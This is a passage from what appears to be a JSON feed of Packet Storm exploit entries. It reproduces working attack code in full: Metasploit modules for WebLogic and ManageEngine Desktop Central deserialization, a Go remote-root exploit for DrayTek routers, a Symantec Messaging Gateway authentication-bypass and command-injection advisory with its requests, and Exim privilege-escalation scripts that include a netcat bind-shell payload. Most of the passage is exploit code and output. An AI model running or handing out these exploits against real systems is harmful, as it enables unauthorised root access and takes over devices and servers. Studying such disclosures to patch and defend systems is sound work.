randomized \npayload << '78' # class footer \npayload << '78' # block footer \n# MISSING OBJECT FOOTER (0x78) \n \npayload << 'fe00ff' # this cruft again. some kind of footer \n \n# sets the length of the stream \ndata = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0') \ndata << payload \n \nsock.put([data].pack('H*')) \nsleep(1) \nsock.get_once \n \nend \n \ndef exploit \nconnect \n \nprint_status('Sending handshake...') \nt3_handshake \n \nprint_status('Sending T3 request object...') \nbuild_t3_request_object \n \nprint_status('Sending client object payload...') \nsend_payload_objdata \n \nhandler \ndisconnect \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152268/weblogic_deserialize_rawobject.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-01T02:16:44", "description": "", "published": "2020-03-31T00:00:00", "type": "packetstorm", "title": "DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-8515"], "modified": "2020-03-31T00:00:00", "id": "PACKETSTORM:156979", "href": "https://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html", "sourceData": "`package main \n \n \n/* \nCVE-2020-8515: DrayTek pre-auth remote root RCE \nMon Mar 30 2020 - 0xsha.io \nAffected: \nDrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, \nand Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, \nand 1.4.4_Beta \nYou should upgrade as soon as possible to 1.5.1 firmware or later \nThis issue has been fixed in Vigor3900/2960/300B v1.5.1. \nread more : \nhttps://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html \nhttps://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/ \nhttps://thehackernews.com/2020/03/draytek-network-hacking.html \nhttps://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ \nexploiting using keyPath \nPOST /cgi-bin/mainfunction.cgi HTTP/1.1 \nHost: 1.2.3.4 \nContent-Length: 89 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a \n*/ \n \nimport ( \n\"fmt\" \n\"io/ioutil\" \n\"net/http\" \n\"net/url\" \n\"os\" \n\"strings\" \n) \n \nfunc usage() { \n \nfmt.Println(\"CVE-2020-8515 exploit by @0xsha \") \nfmt.Println(\"Usage : \" + os.Args[0] + \" URL \" + \"command\" ) \nfmt.Println(\"E.G : \" + os.Args[0] + \" http://1.2.3.4 \" + \"\\\"uname -a\\\"\" ) \n} \n \nfunc main() { \n \n \nif len(os.Args) < 3 { \nusage() \nos.Exit(-1) \n} \n \ntargetUrl := os.Args[1] \n//cmd := \"cat /etc/passwd\" \ncmd := os.Args[2] \n \n \n// payload preparation \nvulnerableFile := \"/cgi-bin/mainfunction.cgi\" \n// specially crafted CMD \n// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a \npayload :=`' \n/bin/sh -c 'CMD' \n'` \npayload = strings.ReplaceAll(payload,\"CMD\", cmd) \nbypass := strings.ReplaceAll(payload,\" \", \"${IFS}\") \n \n//PostForm call url encoder internally \nresp, err := http.PostForm(targetUrl+vulnerableFile , \nurl.Values{\"action\": {\"login\"}, \"keyPath\": {bypass} , \"loginUser\": {\"a\"}, \"loginPwd\": {\"a\"} }) \n \nif err != nil{ \nfmt.Println(\"error connecting host\") \nos.Exit(-1) \n} \n \n \ndefer resp.Body.Close() \nbody, err := ioutil.ReadAll(resp.Body) \n \nif err != nil{ \nfmt.Println(\"error reading data\") \nos.Exit(-1) \n} \n \nfmt.Println(string(body)) \n \n} \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156979/draytek-exec.txt"}, {"lastseen": "2017-08-22T15:20:25", "description": "", "published": "2017-08-18T00:00:00", "type": "packetstorm", "title": "Symantec Messaging Gateway 10.6.3-2 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6327"], "modified": "2017-08-18T00:00:00", "id": "PACKETSTORM:143821", "href": "https://packetstormsecurity.com/files/143821/Symantec-Messaging-Gateway-10.6.3-2-Remote-Code-Execution.html", "sourceData": "`Hello, \n \nThis is an advisory for CVE-2017-6327 which is an unauthenticated remote \ncode execution flaw in the web interface of Symantec Messaging Gateway \nprior to and including version 10.6.3-2, which can be used to execute \ncommands as root. \n \nSymantec Messaging Gateway, formerly known as Brightmail, is a linux-based \nanti-spam/security product for e-mail servers. It is deployed as a physical \ndevice or with ESX in close proximity to the servers it is designed to \nprotect. \n \n=*=*=*=*=*=*=*=*= TIMELINE \n \n2017-07-07: Reported to Symantec \n2017-08-10: Patch and notice released by Symantec [1] \n2017-08-18: Public technical advisory \n \n=*=*=*=*=*=*=*=*= DESCRIPTION \n \n- Bug #1: Web authentication bypass \n \nThe web management interface is available via HTTPS, and you can't do much \nwithout logging in. \n \nIf the current session (identified by the `JSESSIONID` cookie) has the \n`user` attribute set, the session is considered authenticated. \n \nThe file LoginAction.class defines a number of public methods and they can \nall be reached via unauthenticated web requests. \n \nBy making a GET request to `/brightmail/action1.do?method=method_name` we \ncan execute `LoginAction.method_name` if `method_name` is a public method. \n \nOne such public method which will be the target of our authentication \nbypass is called `LoginAction.notificationLogin`. \n \nIt does the following: \n \n1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt` \n2. Creates a new `UserTO` object using the decrypted `notify` parameter as \nan email value \n3. Creates a new session, invalidating the old one if necessary \n4. Sets the `user` attribute of the newly created session to our \nconstructed UserTO object \n \nIt essentially takes a username value from a GET parameter and logs you in \nas this user if it exists. If not, it creates this user for you. \n \nWe need to encrypt our `notify` argument so that \n`BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the \nencryption is just PBEWithMD5AndDES using a static password, conveniently \nincluded in the code itself. I won't include the encryption password or a \nfully encrypted notify string in this post. \n \n \nExample request: \n \nGET \n/brightmail/action1.do?method=notificationLogin¬ify=MTIzNDU2Nzg%3d6[...]&id=test \nHTTP/1.1 \n... \n \n \nHTTP/1.1 302 Found \nServer: Apache-Coyote/1.1 \n... \nSet-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail; \nSecure; HttpOnly \n \n \n- Bug #2: Command injection \n \nThe RestoreAction.performRestore method can be reached with an \nauthenticated session and it takes the restoreSource and \nlocalBackupFilename parameters. \n \nAfter a long chain of function calls, localBackupFilename ends up being \nsent to the local \"bmagent\" daemon listening on port 41002. It will execute \n/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied \nvalue. \n \nThe db-restore script is a sudo wrapper for \n/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl \nscript containing a command injection in a call to /usr/bin/du. \n \n$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;\"`id`\";' \n/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory \nsh: uid=0(root) gid=0(root) groups=0(root): command not found \nERROR: Failed to copy 'asdf;\"`id`\";' from local backup store: No such file \nor directory \n \n \nThis command injection can be exploited from the web management interface \nwith a valid session, which we can create using bug #1. \n \n- Combining bug #1 and #2 \n \nThe last step is to get a CSRF token since the vulnerable performRestore \nfunction is annotated with @CSRF. \n \nAfter some quick digging it turns out that all you need to do is call \n/brightmail/common.jsp to get a token that will be valid for all your \nrequests. \n \nThe URL-encoded value we provide for the `localBackupFileSelection` \nparameter is: \nasdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname \n-a>>/data/bcc/webapps/brightmail/output.txt`hehehe \n \nRequest: \n \nGET \n/brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65 \nHTTP/1.1 \nHost: 192.168.205.220 \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) \nGecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate, br \nCookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \nResponse: \n \nHTTP/1.1 200 OK \nServer: Apache-Coyote/1.1 \nCache-Control: no-store,no-cache \nPragma: no-cache \nExpires: Thu, 01 Jan 1970 00:00:00 GMT \nX-Frame-Options: SAMEORIGIN \nContent-Type: text/html;charset=UTF-8 \nContent-Length: 803 \nDate: Thu, 29 Jun 2017 06:48:12 GMT \nConnection: close \n \n<HTML> \n<title>Symantec Messaging Gateway - Restore</title> \n... \n \n \nNow to confirm that our command output was correctly placed in a file \ninside the webroot. \n \nimac:~% curl -k https://192.168.205.220/brightmail/output.txt \nuid=0(root) gid=0(root) groups=0(root) \nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 \n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux \n \n \n=*=*=*=*=*=*=*=*= EXPLOIT OUTPUT \n \nimac:~/brightmail% python brightmail-rce.py \nhttps://192.168.205.220/brightmail \nbypassing login.. \n* JSESSIONID=693079639299816F80016123BE8A0167 \nverifying login bypass.. \n* Version: 10.6.3 \ngetting csrf token.. \n* 1e35af8c567d3448a65c8516a835cec30b6b8b73 \ndone, verifying.. \n \nuid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root) \ngroups=0(root),99(nobody),499(mysql),502(bcc) \nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 \n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux \n \n \n# cat /etc/issue \n \nSymantec Messaging Gateway \nVersion 10.6.3-2 \nCopyright (c) 1998-2017 Symantec Corporation. All rights reserved. \n \n \n=*=*=*=*=*=*=*=*= REFERENCES \n \n[1] \nhttps://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00 \n \n=*=*=*=*=*=*=*=*= CREDIT \n \nPhilip Pettersson \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/143821/symantecmg-exec.txt"}, {"lastseen": "2020-03-14T22:50:18", "description": "", "cvss3": {}, "published": "2020-03-14T00:00:00", "type": "packetstorm", "title": "ManageEngine Desktop Central Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-14T00:00:00", "id": "PACKETSTORM:156730", "href": "https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine Desktop Central Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in the \ngetChartImage() method from the FileStorage class within ManageEngine \nDesktop Central versions < 10.0.474. Tested against 10.0.465 x64. \n \n\"The short-term fix for the arbitrary file upload vulnerability was \nreleased in build 10.0.474 on January 20, 2020. In continuation of that, \nthe complete fix for the remote code execution vulnerability is now \navailable in build 10.0.479.\" \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-10189'], \n['URL', 'https://srcincite.io/advisories/src-2020-0011/'], \n['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], \n['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], \n['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] \n], \n'DisclosureDate' => '2020-03-05', # 0day release \n'License' => MSF_LICENSE, \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n], \n['Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper \n], \n['PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'RPORT' => 8383, \n'SSL' => true, \n'WfsDelay' => 60 # It can take a little while to trigger \n}, \n'CmdStagerFlavor' => 'certutil', # This works without issue \n'Notes' => { \n'PatchedVersion' => Gem::Version.new('100474'), \n'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? \n'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'configurations.do') \n) \n \nunless res \nreturn CheckCode::Unknown('Target is not responding to check') \nend \n \nunless res.code == 200 && res.body.include?('ManageEngine Desktop Central') \nreturn CheckCode::Unknown('Target is not running Desktop Central') \nend \n \nversion = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text \n \nunless version \nreturn CheckCode::Detected('Could not detect Desktop Central version') \nend \n \nvprint_status(\"Detected Desktop Central version #{version}\") \n \nif Gem::Version.new(version) < notes['PatchedVersion'] \nreturn CheckCode::Appears(\"#{version} is an exploitable version\") \nend \n \nCheckCode::Safe(\"#{version} is not an exploitable version\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# XXX: An executable is required to run arbitrary commands \ncmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper \n \nvprint_status(\"Serializing command: #{cmd}\") \n \n# I identified mr_me's binary blob as the CommonsBeanutils1 payload :) \nserialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( \n'CommonsBeanutils1', \ncmd \n) \n \n# XXX: Patch in expected serialVersionUID \nserialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\" \n \n# Rock 'n' roll! \nupload_serialized_payload(serialized_payload) \ndeserialize_payload \nend \n \ndef upload_serialized_payload(serialized_payload) \nprint_status('Uploading serialized payload') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/mdm/client/v1/mdmLogUploader'), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart', \n'filename' => 'logger.zip' \n}, \n'data' => serialized_payload \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') \nend \n \nprint_good('Successfully uploaded serialized payload') \n \n# C:\\Program Files\\DesktopCentral_Server\\bin \nregister_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip') \nend \n \ndef deserialize_payload \nprint_status('Deserializing payload') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'cewolf/'), \n'vars_get' => {'img' => '\\\\logger.zip'} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not deserialize payload') \nend \n \nprint_good('Successfully deserialized payload') \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156730/desktopcentral_deserialization.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-18T11:49:32", "description": "", "cvss3": {}, "published": "2019-06-17T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "PACKETSTORM:153312", "href": "https://packetstormsecurity.com/files/153312/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`#!/bin/bash \n \n# \n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit \n# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> \n# \n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \n# Improper validation of recipient address in deliver_message() \n# function in /src/deliver.c may lead to remote command execution. \n# (CVE-2019-10149) \n# \n# This is a local privilege escalation exploit for \"The Return \n# of the WIZard\" vulnerability reported by the Qualys Security \n# Advisory team. \n# \n# Credits: \n# Qualys Security Advisory team (kudos for your amazing research!) \n# Dennis 'dhn' Herrmann (/dev/tcp technique) \n# \n# Usage (setuid method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m setuid \n# Preparing setuid shell helper... \n# Delivering setuid payload... \n# [...] \n# Waiting 5 seconds... \n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned \n# # id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Usage (netcat method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m netcat \n# Delivering netcat payload... \n# Waiting 5 seconds... \n# localhost [127.0.0.1] 31337 (?) open \n# id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Vulnerable platforms: \n# Exim 4.87 - 4.91 \n# \n# Tested against: \n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] \n# \n \nMETHOD=\"setuid\" # default method \nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost' \nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost' \n \n# usage instructions \nfunction usage() \n{ \necho \"$0 [-m METHOD]\" \necho \necho \"-m setuid : use the setuid payload (default)\" \necho \"-m netcat : use the netcat payload\" \necho \nexit 1 \n} \n \n# payload delivery \nfunction exploit() \n{ \n# connect to localhost:25 \nexec 3<>/dev/tcp/localhost/25 \n \n# deliver the payload \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho \"rcpt to:<$PAYLOAD>\" >&3 \nread -u 3 && echo $REPLY \necho \"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in {1..31} \ndo \necho \"Received: $i\" >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n} \n \n# print banner \necho \necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit' \necho 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>' \necho \n \n# parse command line \nwhile [ ! -z \"$1\" ]; do \ncase $1 in \n-m) shift; METHOD=\"$1\"; shift;; \n* ) usage \n;; \nesac \ndone \nif [ -z $METHOD ]; then \nusage \nfi \n \n# setuid method \nif [ $METHOD = \"setuid\" ]; then \n \n# prepare a setuid shell helper to circumvent bash checks \necho \"Preparing setuid shell helper...\" \necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c \ngcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null \nif [ $? -ne 0 ]; then \necho \"Problems compiling setuid shell helper, check your gcc.\" \necho \"Falling back to the /bin/sh method.\" \ncp /bin/sh /tmp/pwned \nfi \necho \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_SETUID \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nls -l /tmp/pwned \n/tmp/pwned \n \n# netcat method \nelif [ $METHOD = \"netcat\" ]; then \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_NETCAT \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nnc -v 127.0.0.1 31337 \n \n# print help \nelse \nusage \nfi \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/153312/raptor_exim_wiz.sh.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-24T22:40:27", "description": "", "cvss3": {}, "published": "2019-08-23T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-08-23T00:00:00", "id": "PACKETSTORM:154198", "href": "https://packetstormsecurity.com/files/154198/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'expect' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation', \n'Description' => %q{ \nThis module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). \nImproper validation of recipient address in deliver_message() \nfunction in /src/deliver.c may lead to command execution with root privileges \n(CVE-2019-10149). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Qualys', # Discovery and PoC (@qualys) \n'Dennis Herrmann', # Working exploit (@dhn) \n'Marco Ivaldi', # Working exploit (@0xdea) \n'Guillaume Andr\u00e9' # Metasploit module (@yaumn_) \n], \n'DisclosureDate' => '2019-06-05', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Exim 4.87 - 4.91', \nlower_version: Gem::Version.new('4.87'), \nupper_version: Gem::Version.new('4.91') \n] \n], \n'DefaultOptions' => \n{ \n'PrependSetgid' => true, \n'PrependSetuid' => true \n}, \n'References' => \n[ \n[ 'CVE', '2019-10149' ], \n[ 'EDB', '46996' ], \n[ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ] \n] \n)) \n \nregister_options( \n[ \nOptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ]) \n]) \n \nregister_advanced_options( \n[ \nOptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]), \nOptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n]) \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef encode_command(cmd) \n'\\x' + cmd.unpack('H2' * cmd.length).join('\\x') \nend \n \ndef open_tcp_connection \nsocket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client) \nparams = Rex::Socket::Parameters.new({ \n'PeerHost' => '127.0.0.1', \n'PeerPort' => datastore['EXIMPORT'] \n}) \nbegin \nsocket = socket_subsystem.create_tcp_client_channel(params) \nrescue => e \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? (see EXIMPORT)\") \nraise e \nend \nreturn socket_subsystem, socket \nend \n \ndef inject_payload(payload) \nif session.type == 'meterpreter' \nsocket_subsystem, socket = open_tcp_connection \n \ntcp_conversation = { \nnil => /220/, \n'helo localhost' => /250/, \n\"MAIL FROM:<>\" => /250/, \n\"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/, \n'DATA' => /354/, \n'Received:' => nil, \n'.' => /250/ \n} \n \nbegin \ntcp_conversation.each do |line, pattern| \nTimeout.timeout(datastore['SendExpectTimeout']) do \nif line \nif line == 'Received:' \nfor i in (1..31) \nsocket.puts(\"#{line} #{i}\\n\") \nend \nelse \nsocket.puts(\"#{line}\\n\") \nend \nend \nif pattern \nsocket.expect(pattern) \nend \nend \nend \nrescue Rex::ConnectionError => e \nfail_with(Failure::Unreachable, e.message) \nrescue Timeout::Error \nfail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out') \nensure \nsocket.puts(\"QUIT\\n\") \nsocket.close \nsocket_subsystem.shutdown \nend \nelse \nunless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\ \n\"&& echo true\").chomp.to_s == 'true' \nfail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\") \nend \n \nbash_script = %| \n#!/bin/bash \n \nexec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']} \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho 'rcpt to:<${run{#{payload}}}@localhost>' >&3 \nread -u 3 && echo $REPLY \necho \"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in $(seq 1 30); do \necho 'Received: $i' >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n| \n \n@bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@bash_script_path, bash_script) \nregister_file_for_cleanup(@bash_script_path) \nchmod(@bash_script_path) \ncmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\") \nend \n \nprint_status('Payload sent, wait a few seconds...') \nRex.sleep(5) \nend \n \ndef check_for_bash \nunless command_exists?('/bin/bash') \nfail_with(Failure::NotFound, 'bash not found') \nend \nend \n \ndef on_new_session(session) \nsuper \n \nif session.type == 'meterpreter' \nsession.core.use('stdapi') unless session.ext.aliases.include?('stdapi') \nsession.fs.file.rm(@payload_path) \nelse \nsession.shell_command_token(\"rm -f #{@payload_path}\") \nend \nend \n \ndef check \nif session.type == 'meterpreter' \nbegin \nsocket_subsystem, socket = open_tcp_connection \nrescue \nreturn CheckCode::Safe \nend \nres = socket.gets \nsocket.close \nsocket_subsystem.shutdown \nelse \ncheck_for_bash \nres = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\ \n\"(read -u 3 && echo $REPLY) || echo false'\") \nif res == 'false' \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? (see EXIMPORT)\") \nreturn CheckCode::Safe \nend \nend \n \nif res =~ /Exim ([0-9\\.]+)/i \nversion = Gem::Version.new($1) \nvprint_status(\"Found exim version: #{version}\") \nif version >= target[:lower_version] && version <= target[:upper_version] \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \nCheckCode::Unknown \nend \n \ndef exploit \nif is_root? \nunless datastore['ForceExploit'] \nfail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.') \nend \nend \n \nunless writable?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is not writable\") \nend \n \nif nosuid?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\") \nend \n \nunless datastore['PrependSetuid'] && datastore['PrependSetgid'] \nfail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\ \n'to get root privileges.') \nend \n \nif session.type == 'shell' \ncheck_for_bash \nend \n \n@payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@payload_path, payload.encoded_exe) \nregister_file_for_cleanup(@payload_path) \ninject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\ \n\"chmod 4755 #{@payload_path}'\")) \n \nunless setuid?(@payload_path) \nfail_with(Failure::Unknown, \"Couldn't escalate privileges\") \nend \n \ncmd_exec(\"#{@payload_path} & echo \") \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/154198/exim4_deliver_message_priv_esc.rb.txt", "cvss": {"score": 7.5, "vector": 